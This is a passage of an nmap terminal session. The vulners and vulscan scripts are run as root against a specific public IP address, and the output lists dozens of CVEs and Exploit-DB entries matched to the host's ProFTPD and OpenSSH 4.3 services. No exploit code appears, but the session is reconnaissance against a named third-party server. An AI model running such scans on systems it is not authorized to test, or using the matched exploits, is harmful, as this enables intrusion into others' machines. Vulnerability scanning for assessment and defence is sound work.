  2041. | [CVE-2011-4130] Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.
  2042. | [CVE-2011-1137] Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message.
  2043. | [CVE-2010-4652] Heap-based buffer overflow in the sql_prepare_where function (contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted username containing substitution tags, which are not properly handled during construction of an SQL query.
  2044. | [CVE-2010-4221] Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.
  2045. | [CVE-2010-3867] Multiple directory traversal vulnerabilities in the mod_site_misc module in ProFTPD before 1.3.3c allow remote authenticated users to create directories, delete directories, create symlinks, and modify file timestamps via directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE SYMLINK, or (4) SITE UTIME command.
  2046. | [CVE-2009-3639] The mod_tls module in ProFTPD before 1.3.2b, and 1.3.3 before 1.3.3rc2, when the dNSNameRequired TLS option is enabled, does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 client certificate, which allows remote attackers to bypass intended client-hostname restrictions via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
  2047. | [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
  2048. | [CVE-2012-6095] ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows local users to modify the ownership of arbitrary files via a race condition and a symlink attack on the (1) MKD or (2) XMKD commands.
  2049. | [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote attackers to bypass SQL injection protection mechanisms via invalid, encoded multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2) mod_sql_postgres.
  2050. | [CVE-2009-0542] SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
  2051. | [CVE-2008-7265] The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows remote authenticated users to cause a denial of service (CPU consumption) via an ABOR command during a data transfer.
  2052. | [CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser.
  2053. | [CVE-2006-6563] Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
  2054. | [CVE-2006-6171] ** DISPUTED ** ProFTPD 1.3.0a and earlier does not properly set the buffer size limit when CommandBufferSize is specified in the configuration file, which leads to an off-by-two buffer underflow. NOTE: in November 2006, the role of CommandBufferSize was originally associated with CVE-2006-5815, but this was an error stemming from a vague initial disclosure. NOTE: ProFTPD developers dispute this issue, saying that the relevant memory location is overwritten by assignment before further use within the affected function, so this is not a vulnerability.
  2055. | [CVE-2006-6170] Buffer overflow in the tls_x509_name_oneline function in the mod_tls module, as used in ProFTPD 1.3.0a and earlier, and possibly other products, allows remote attackers to execute arbitrary code via a large data length argument, a different vulnerability than CVE-2006-5815.
  2056. | [CVE-2006-5815] Stack-based buffer overflow in the sreplace function in ProFTPD 1.3.0 and earlier allows remote attackers, probably authenticated, to cause a denial of service and execute arbitrary code, as demonstrated by vd_proftpd.pm, a "ProFTPD remote exploit."
  2057. | [CVE-2005-4816] Buffer overflow in mod_radius in ProFTPD before 1.3.0rc2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long password.
  2058. | [CVE-2005-2390] Multiple format string vulnerabilities in ProFTPD before 1.3.0rc2 allow attackers to cause a denial of service or obtain sensitive information via (1) certain inputs to the shutdown message from ftpshut, or (2) the SQLShowInfo mod_sql directive.
  2059. |
  2060. | SecurityFocus - https://www.securityfocus.com/bid/:
  2061. | [50631] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
  2062. |
  2063. | IBM X-Force - https://exchange.xforce.ibmcloud.com:
  2064. | [80980] ProFTPD FTP commands symlink
  2065. | [71226] ProFTPD pool code execution
  2066. | [65207] ProFTPD mod_sftp module denial of service
  2067. | [64495] ProFTPD sql_prepare_where() buffer overflow
  2068. | [63658] ProFTPD FTP server backdoor
  2069. | [63407] mod_sql module for ProFTPD buffer overflow
  2070. | [63155] ProFTPD pr_data_xfer denial of service
  2071. | [62909] ProFTPD mod_site_misc directory traversal
  2072. | [62908] ProFTPD pr_netio_telnet_gets() buffer overflow
  2073. | [53936] ProFTPD mod_tls SSL certificate security bypass
  2074. | [48951] ProFTPD mod_sql username percent SQL injection
  2075. | [48558] ProFTPD NLS support SQL injection protection bypass
  2076. | [45274] ProFTPD URL cross-site request forgery
  2077. | [33733] ProFTPD Auth API security bypass
  2078. | [31461] ProFTPD mod_radius buffer overflow
  2079. | [30906] ProFTPD Controls (mod_ctrls) module buffer overflow
  2080. | [30554] ProFTPD mod_tls module tls_x509_name_oneline() buffer overflow
  2081. | [30147] ProFTPD sreplace() buffer overflow
  2082. | [21530] ProFTPD mod_sql format string attack
  2083. | [21528] ProFTPD shutdown message format string attack
  2084. | [19410] GProFTPD file name format string attack
  2085. | [18453] ProFTPD SITE CHGRP command allows group ownership modification
  2086. | [17724] ProFTPD could allow an attacker to obtain valid accounts
  2087. | [16038] ProFTPD CIDR entry ACL bypass
  2088. | [15387] ProFTPD off-by-one _xlate_ascii_write function buffer overflow
  2089. | [12369] ProFTPD mod_sql SQL injection
  2090. | [12200] ProFTPD ASCII file newline buffer overflow
  2091. | [10932] ProFTPD long PASS command buffer overflow
  2092. | [8332] ProFTPD mod_sqlpw stores passwords in the wtmp log file
  2093. | [7818] ProFTPD ls &quot
  2094. | [7816] ProFTPD file globbing denial of service
  2095. | [7126] ProFTPD fails to resolve hostnames
  2096. | [6433] ProFTPD format string
  2097. | [6209] proFTPD /var symlink
  2098. | [6208] ProFTPD contains configuration error in postinst script when running as root
  2099. | [5801] proftpd memory leak when using SIZE or USER commands
  2100. | [5737] ProFTPD system using mod_sqlpw unauthorized access
  2101. |
  2102. | Exploit-DB - https://www.exploit-db.com:
  2103. | [16878] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
  2104. | [16851] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
  2105. | [15662] ProFTPD 1.3.3c compromised source remote root Trojan
  2106. | [20690] wu-ftpd 2.4/2.5/2.6,Trolltech ftpd 1.2,ProFTPD 1.2,BeroFTPD 1.3.4 FTP glob Expansion Vulnerability
  2107. | [16852] ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
  2108. | [10044] ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)
  2109. | [3730] ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
  2110. | [3333] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit 2
  2111. | [3330] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit
  2112. | [2928] ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
  2113. | [2856] ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
  2114. |
  2115. | OpenVAS (Nessus) - http://www.openvas.org:
  2116. | [103331] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
  2117. | [63497] Debian Security Advisory DSA 1730-1 (proftpd-dfsg)
  2118. |
  2119. | SecurityTracker - https://www.securitytracker.com:
  2120. | [1028040] ProFTPD MKD/XMKD Race Condition Lets Local Users Gain Elevated Privileges
  2121. | [1026321] ProFTPD Use-After-Free Memory Error Lets Remote Authenticated Users Execute Arbitrary Code
  2122. | [1020945] ProFTPD Request Processing Bug Permits Cross-Site Request Forgery Attacks
  2123. | [1017931] ProFTPD Auth API State Error May Let Remote Users Access the System in Certain Cases
  2124. | [1017167] ProFTPD sreplace() Off-by-one Bug Lets Remote Users Execute Arbitrary Code
  2125. | [1012488] ProFTPD SITE CHGRP Command Lets Remote Authenticated Users Modify File/Directory Group Ownership
  2126. | [1011687] ProFTPd Login Timing Differences Disclose Valid User Account Names to Remote Users
  2127. | [1009997] ProFTPD Access Control Bug With CIDR Addresses May Let Remote Authenticated Users Access Files
  2128. | [1009297] ProFTPD _xlate_ascii_write() Off-By-One Buffer Overflows Let Remote Users Execute Arbitrary Code With Root Privileges
  2129. | [1007794] ProFTPD ASCII Mode File Upload Buffer Overflow Lets Certain Remote Users Execute Arbitrary Code
  2130. | [1007020] ProFTPD Input Validation Flaw When Authenticating Against Postgresql Using 'mod_sql' Lets Remote Users Gain Access
  2131. | [1003019] ProFTPD FTP Server May Allow Local Users to Execute Code on the Server
  2132. | [1002354] ProFTPD Reverse DNS Feature Fails to Check Forward-to-Reverse DNS Mappings
  2133. | [1002148] ProFTPD Site and Quote Commands May Allow Remote Users to Execute Arbitrary Commands on the Server
  2134. |
  2135. | OSVDB - http://www.osvdb.org:
  2136. | [89051] ProFTPD Multiple FTP Command Handling Symlink Arbitrary File Overwrite
  2137. | [77004] ProFTPD Use-After-Free Response Pool Allocation List Parsing Remote Memory Corruption
  2138. | [70868] ProFTPD mod_sftp Component SSH Payload DoS
  2139. | [70782] ProFTPD contrib/mod_sql.c sql_prepare_where Function Crafted Username Handling Remote Overflow
  2140. | [69562] ProFTPD on ftp.proftpd.org Compromised Source Packages Trojaned Distribution
  2141. | [69200] ProFTPD pr_data_xfer Function ABOR Command Remote DoS
  2142. | [68988] ProFTPD mod_site_misc Module Multiple Command Traversal Arbitrary File Manipulation
  2143. | [68985] ProFTPD netio.c pr_netio_telnet_gets Function TELNET_IAC Escape Sequence Remote Overflow
  2144. | [59292] ProFTPD mod_tls Module Certificate Authority (CA) subjectAltName Field Null Byte Handling SSL MiTM Weakness
  2145. | [57311] ProFTPD contrib/mod_ratio.c Multiple Unspecified Buffer Handling Issues
  2146. | [57310] ProFTPD Multiple Unspecified Overflows
  2147. | [57309] ProFTPD src/support.c Unspecified Buffer Handling Issue
  2148. | [57308] ProFTPD modules/mod_core.c Multiple Unspecified Overflows
  2149. | [57307] ProFTPD Multiple Modules Unspecified Overflows
  2150. | [57306] ProFTPD contrib/mod_pam.c Multiple Unspecified Buffer Handling Issues
  2151. | [57305] ProFTPD src/main.c Unspecified Overflow
  2152. | [57304] ProFTPD src/log.c Logfile Handling Unspecified Race Condition
  2153. | [57303] ProFTPD modules/mod_auth.c Unspecified Issue
  2154. | [51954] ProFTPD Server NLS Support mod_sql_* Encoded Multibyte Character SQL Injection Protection Bypass
  2155. | [51953] ProFTPD Server mod_sql username % Character Handling SQL Injection
  2156. | [51849] ProFTPD Character Encoding SQL Injection
  2157. | [51720] ProFTPD NLST Command Argument Handling Remote Overflow
  2158. | [51719] ProFTPD MKDIR Command Directory Name Handling Remote Overflow
  2159. | [48411] ProFTPD FTP Command Truncation CSRF
  2160. | [34602] ProFTPD Auth API Multiple Auth Module Authentication Bypass
  2161. | [31509] ProFTPD mod_ctrls Module pr_ctrls_recv_request Function Local Overflow
  2162. | [30719] mod_tls Module for ProFTPD tls_x509_name_oneline Function Remote Overflow
  2163. | [30660] ProFTPD CommandBufferSize Option cmd_loop() Function DoS
  2164. | [30267] ProFTPD src/support.c sreplace() Function Remote Overflow
  2165. | [23063] ProFTPD mod_radius Password Overflow DoS
  2166. | [20212] ProFTPD Host Reverse Resolution Failure ACL Bypass
  2167. | [18271] ProFTPD mod_sql SQLShowInfo Directive Format String
  2168. | [18270] ProFTPD ftpshut Shutdown Message Format String
  2169. | [14012] GProftpd gprostats Utility Log Parser Remote Format String
  2170. | [10769] ProFTPD File Transfer Newline Character Overflow
  2171. | [10768] ProFTPD STAT Command Remote DoS
  2172. | [10758] ProFTPD Login Timing Account Name Enumeration
  2173. | [10173] ProFTPD mod_sqlpw wtmp Authentication Credential Disclosure
  2174. | [9507] PostgreSQL Authentication Module (mod_sql) for ProFTPD USER Name Parameter SQL Injection
  2175. | [9163] ProFTPD MKDIR Directory Creation / Change Remote Overflow (palmetto)
  2176. | [7166] ProFTPD SIZE Command Memory Leak Remote DoS
  2177. | [7165] ProFTPD USER Command Memory Leak DoS
  2178. | [5744] ProFTPD CIDR IP Subnet ACL Bypass
  2179. | [5705] ProFTPD Malformed cwd Command Format String
  2180. | [5638] ProFTPD on Debian Linux postinst Installation Privilege Escalation
  2181. | [4134] ProFTPD in_xlate_ascii_write() Function RETR Command Remote Overflow
  2182. | [144] ProFTPD src/log.c log_xfer() Function Remote Overflow
  2183. |_
  2184. Service Info: OS: Unix
  2185.  
  2186. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2187. Nmap done: 1 IP address (1 host up) scanned in 10.51 seconds
  2188.  
  2189.  
  2190. root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners,vulscan --script-args vulscandb -sV -p22 184.154.192.250
  2191. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:30 CST
  2192. Nmap scan report for server.etours.cn (184.154.192.250)
  2193. Host is up (0.037s latency).
  2194.  
  2195. PORT STATE SERVICE VERSION
  2196. 22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
  2197. | vulners:
  2198. | cpe:/a:openbsd:openssh:4.3:
  2199. | CVE-2006-5051 9.3 https://vulners.com/cve/CVE-2006-5051
  2200. | CVE-2006-4924 7.8 https://vulners.com/cve/CVE-2006-4924
  2201. | CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
  2202. | CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
  2203. | CVE-2007-4752 7.5 https://vulners.com/cve/CVE-2007-4752
  2204. | CVE-2009-2904 6.9 https://vulners.com/cve/CVE-2009-2904
  2205. | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
  2206. | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
  2207. | CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
  2208. | CVE-2008-4109 5.0 https://vulners.com/cve/CVE-2008-4109
  2209. | CVE-2007-2243 5.0 https://vulners.com/cve/CVE-2007-2243
  2210. | CVE-2006-5052 5.0 https://vulners.com/cve/CVE-2006-5052
  2211. | CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
  2212. | CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
  2213. | CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
  2214. | CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
  2215. |_ CVE-2008-3259 1.2 https://vulners.com/cve/CVE-2008-3259
  2216. | vulscan: VulDB - https://vuldb.com:
  2217. | [44077] OpenBSD OpenSSH up to 4.3 Signal denial of service
  2218. | [39331] OpenSSH 4.3p2 Audit Log linux_audit_record_event unknown vulnerability
  2219. | [43307] OpenSSH 4.0 unknown vulnerability
  2220. | [41835] OpenSSH up to 4.8 unknown vulnerability
  2221. | [38743] OpenSSH up to 4.6 unknown vulnerability
  2222. | [36382] OpenBSD OpenSSH up to 4.6 information disclosure
  2223. | [32699] OpenBSD OpenSSH 4.1 denial of service
  2224. | [2667] OpenBSD OpenSSH 4.4 Separation Monitor unknown vulnerability
  2225. |
  2226. | MITRE CVE - https://cve.mitre.org:
  2227. | [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4 and Fedora 11, allows local users to gain privileges via hard links to setuid programs that use configuration files within the chroot directory, related to requirements for directory ownership.
  2228. | [CVE-2008-4109] A certain Debian patch for OpenSSH before 4.3p2-9etch3 on etch
  2229. | [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
  2230. | [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
  2231. | [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
  2232. | [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact. NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points. As of 20080827, no unofficial distributions of this software are known.
  2233. | [CVE-2008-3234] sshd in OpenSSH 4 on Debian GNU/Linux, and the 20070303 OpenSSH snapshot, allows remote authenticated users to obtain access to arbitrary SELinux roles by appending a :/ (colon slash) sequence, followed by the role name, to the username.
  2234. | [CVE-2008-1657] OpenSSH 4.4 up to versions before 4.9 allows remote authenticated users to bypass the sshd_config ForceCommand directive by modifying the .ssh/rc session file.
  2235. | [CVE-2007-6415] scponly 4.6 and earlier allows remote authenticated users to bypass intended restrictions and execute arbitrary code by invoking scp, as implemented by OpenSSH, with the -F and -o options.
  2236. | [CVE-2007-4752] ssh in OpenSSH before 4.7 does not properly handle when an untrusted cookie cannot be created and uses a trusted X11 cookie instead, which allows attackers to violate intended policy and gain privileges by causing an X client to be treated as trusted.
  2237. | [CVE-2007-2243] OpenSSH 4.6 and earlier, when ChallengeResponseAuthentication is enabled, allows remote attackers to determine the existence of user accounts by attempting to authenticate via S/KEY, which displays a different response if the user account exists, a similar issue to CVE-2001-1483.
  2238. | [CVE-2006-5794] Unspecified vulnerability in the sshd Privilege Separation Monitor in OpenSSH before 4.5 causes weaker verification that authentication has been successful, which might allow attackers to bypass authentication. NOTE: as of 20061108, it is believed that this issue is only exploitable by leveraging vulnerabilities in the unprivileged process, which are not known to exist.
  2239. | [CVE-2006-5229] OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions, and possibly under limited configurations, allows remote attackers to determine valid usernames via timing discrepancies in which responses take longer for valid usernames than invalid ones, as demonstrated by sshtime. NOTE: as of 20061014, it appears that this issue is dependent on the use of manually-set passwords that causes delays when processing /etc/shadow due to an increased number of rounds.
  2240. | [CVE-2006-5052] Unspecified vulnerability in portable OpenSSH before 4.4, when running on some platforms, allows remote attackers to determine the validity of usernames via unknown vectors involving a GSSAPI "authentication abort."
  2241. | [CVE-2006-5051] Signal handler race condition in OpenSSH before 4.4 allows remote attackers to cause a denial of service (crash), and possibly execute arbitrary code if GSSAPI authentication is enabled, via unspecified vectors that lead to a double-free.
  2242. | [CVE-2006-4924] sshd in OpenSSH before 4.4, when using the version 1 SSH protocol, allows remote attackers to cause a denial of service (CPU consumption) via an SSH packet that contains duplicate blocks, which is not properly handled by the CRC compensation attack detector.
  2243. | [CVE-2006-0225] scp in OpenSSH 4.2p1 allows attackers to execute arbitrary commands via filenames that contain shell metacharacters or spaces, which are expanded twice.
  2244. | [CVE-2005-2798] sshd in OpenSSH before 4.2, when GSSAPIDelegateCredentials is enabled, allows GSSAPI credentials to be delegated to clients who log in using non-GSSAPI methods, which could cause those credentials to be exposed to untrusted users or hosts.
  2245. | [CVE-2005-2797] OpenSSH 4.0, and other versions before 4.2, does not properly handle dynamic port forwarding ("-D" option) when a listen address is not provided, which may cause OpenSSH to enable the GatewayPorts functionality.
  2246. | [CVE-2005-2666] SSH, as implemented in OpenSSH before 4.0 and possibly other implementations, stores hostnames, IP addresses, and keys in plaintext in the known_hosts file, which makes it easier for an attacker that has compromised an SSH user's account to generate a list of additional targets that are more likely to have the same password or key.
  2247. | [CVE-2001-1029] libutil in OpenSSH on FreeBSD 4.4 and earlier does not drop privileges before verifying the capabilities for reading the copyright and welcome files, which allows local users to bypass the capabilities checks and read arbitrary files by specifying alternate copyright or welcome files.
  2248. |
  2249. | SecurityFocus - https://www.securityfocus.com/bid/:
  2250. | [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
  2251. |
  2252. | IBM X-Force - https://exchange.xforce.ibmcloud.com:
  2253. | [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
  2254. |
  2255. | Exploit-DB - https://www.exploit-db.com:
  2256. | [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
  2257. | [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
  2258. | [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
  2259. |
  2260. | OpenVAS (Nessus) - http://www.openvas.org:
  2261. | [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
  2262. | [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
  2263. | [881183] CentOS Update for openssh CESA-2012:0884 centos6
  2264. | [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
  2265. | [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
  2266. | [870763] RedHat Update for openssh RHSA-2012:0884-04
  2267. | [870129] RedHat Update for openssh RHSA-2008:0855-01
  2268. | [861813] Fedora Update for openssh FEDORA-2010-5429
  2269. | [861319] Fedora Update for openssh FEDORA-2007-395
  2270. | [861170] Fedora Update for openssh FEDORA-2007-394
  2271. | [861012] Fedora Update for openssh FEDORA-2007-715
  2272. | [840345] Ubuntu Update for openssh vulnerability USN-597-1
  2273. | [840300] Ubuntu Update for openssh update USN-612-5
  2274. | [840271] Ubuntu Update for openssh vulnerability USN-612-2
  2275. | [840268] Ubuntu Update for openssh update USN-612-7
  2276. | [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
  2277. | [840214] Ubuntu Update for openssh vulnerability USN-566-1
  2278. | [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
  2279. | [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
  2280. | [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
  2281. | [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
  2282. | [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
  2283. | [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
  2284. | [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
  2285. | [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
  2286. | [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
  2287. | [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
  2288. | [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
  2289. | [100584] OpenSSH X Connections Session Hijacking Vulnerability
  2290. | [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
  2291. | [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
  2292. | [65987] SLES10: Security update for OpenSSH
  2293. | [65819] SLES10: Security update for OpenSSH
  2294. | [65514] SLES9: Security update for OpenSSH
  2295. | [65513] SLES9: Security update for OpenSSH
  2296. | [65334] SLES9: Security update for OpenSSH
  2297. | [65248] SLES9: Security update for OpenSSH
  2298. | [65218] SLES9: Security update for OpenSSH
  2299. | [65169] SLES9: Security update for openssh,openssh-askpass
  2300. | [65126] SLES9: Security update for OpenSSH
  2301. | [65019] SLES9: Security update for OpenSSH
  2302. | [65015] SLES9: Security update for OpenSSH
  2303. | [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
  2304. | [61639] Debian Security Advisory DSA 1638-1 (openssh)
  2305. | [61030] Debian Security Advisory DSA 1576-2 (openssh)
  2306. | [61029] Debian Security Advisory DSA 1576-1 (openssh)
  2307. | [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
  2308. | [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
  2309. | [60667] Slackware Advisory SSA:2008-095-01 openssh
  2310. | [59014] Slackware Advisory SSA:2007-255-01 openssh
  2311. | [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
  2312. | [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
  2313. | [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
  2314. | [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
  2315. | [57492] Slackware Advisory SSA:2006-272-02 openssh
  2316. | [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
  2317. | [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
  2318. | [57470] FreeBSD Ports: openssh
  2319. | [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
  2320. | [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
  2321. | [56294] Slackware Advisory SSA:2006-045-06 openssh
  2322. | [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
  2323. | [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
  2324. | [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
  2325. | [53788] Debian Security Advisory DSA 025-1 (openssh)
  2326. | [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
  2327. | [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
  2328. | [11343] OpenSSH Client Unauthorized Remote Forwarding
  2329. | [10954] OpenSSH AFS/Kerberos ticket/token passing
  2330. | [10883] OpenSSH Channel Code Off by 1
  2331. | [10823] OpenSSH UseLogin Environment Variables
  2332. |
  2333. | SecurityTracker - https://www.securitytracker.com:
  2334. | [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
  2335. | [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
  2336. | [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
  2337. | [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
  2338. | [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
  2339. | [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
  2340. | [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
  2341. | [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
  2342. | [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
  2343. | [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
  2344. | [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
  2345. | [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
  2346. | [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
  2347. | [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
  2348. | [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
  2349. | [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
  2350. | [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
  2351. | [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
  2352. | [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
  2353. | [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
  2354. | [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
  2355. | [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
  2356. | [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
  2357. | [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
  2358. | [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
  2359. | [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
  2360. | [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
  2361. | [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
  2362. | [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
  2363. | [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
  2364. | [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
  2365. | [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
